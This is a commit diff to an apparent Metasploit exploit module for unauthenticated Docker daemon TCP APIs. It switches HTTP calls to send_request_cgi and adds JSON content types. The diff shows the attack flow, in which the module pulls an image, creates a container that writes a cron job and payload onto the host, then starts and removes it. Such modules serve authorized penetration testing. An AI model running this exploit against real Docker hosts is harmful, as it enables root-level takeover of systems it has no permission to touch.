send_request_cgi instead of send_request_raw

mpizala · mpizala · commit 6d28a579f304 · 2017-10-09T13:12:48.000+02:00
diff --git a/modules/exploits/linux/http/docker_daemon_tcp.rb b/modules/exploits/linux/http/docker_daemon_tcp.rb
@@ -50,9 +50,10 @@ def initialize(info = {})
 
   def check_image(image_id)
     vprint_status("Check if images exist on the target host")
-    res = send_request_raw(
+    res = send_request_cgi(
       'method'  => 'GET',
-      'uri'     => normalize_uri('images', 'json')
+      'uri'     => normalize_uri('images', 'json'),
+      'ctype'   => 'application/json'
     )
     return unless res && res.code == 200 && res.body.include?(image_id)
 
@@ -61,9 +62,10 @@ def check_image(image_id)
 
   def pull_image(image_id)
     print_status("Trying to pulling image from docker registry, this may take a while")
-    res = send_request_raw(
+    res = send_request_cgi(
       'method'  => 'POST',
-      'uri'     => normalize_uri('images', 'create?fromImage=' + image_id)
+      'uri'     => normalize_uri('images', 'create?fromImage=' + image_id),
+      'ctype'   => 'application/json'
     )
     return unless res && res.code == 200
 
@@ -104,19 +106,21 @@ def make_container(mnt_path, cron_path, payload_path)
   end
 
   def del_container(container_id)
-    send_request_raw(
+    send_request_cgi(
       {
         'method'  => 'DELETE',
-        'uri'     => normalize_uri('containers', container_id)
+        'uri'     => normalize_uri('containers', container_id),
+        'ctype'   => 'application/json'
       },
       1 # timeout
     )
   end
 
   def check
-    res = send_request_raw(
+    res = send_request_cgi(
       'method'   => 'GET',
       'uri'      => normalize_uri('containers', 'json'),
+      'ctype'    => 'application/json',
       'headers'  => { 'Accept' => 'application/json' }
     )
 
@@ -151,10 +155,10 @@ def exploit
     container_id = make_container_id
 
     # create container
-    res_create = send_request_raw(
+    res_create = send_request_cgi(
       'method'  => 'POST',
       'uri'     => normalize_uri('containers', 'create?name=' + container_id),
-      'headers' => { 'Content-Type' => 'application/json' },
+      'ctype'   => 'application/json',
       'data'    => make_container(mnt_path, cron_path, payload_path).to_json
     )
     fail_with(Failure::Unknown, 'Failed to create the docker container') unless res_create && res_create.code == 201
@@ -163,19 +167,21 @@ def exploit
     register_files_for_cleanup(cron_path, payload_path)
 
     # start container
-    send_request_raw(
+    send_request_cgi(
       {
         'method'  => 'POST',
-        'uri'     => normalize_uri('containers', container_id, 'start')
+        'uri'     => normalize_uri('containers', container_id, 'start'),
+        'ctype'   => 'application/json'
       },
       1 # timeout
     )
 
     # wait until container stopped
     vprint_status("Waiting until the docker container stopped")
-    res_wait = send_request_raw(
+    res_wait = send_request_cgi(
       'method'  => 'POST',
       'uri'     => normalize_uri('containers', container_id, 'wait'),
+      'ctype'   => 'application/json',
       'headers' => { 'Accept' => 'application/json' }
     )
 
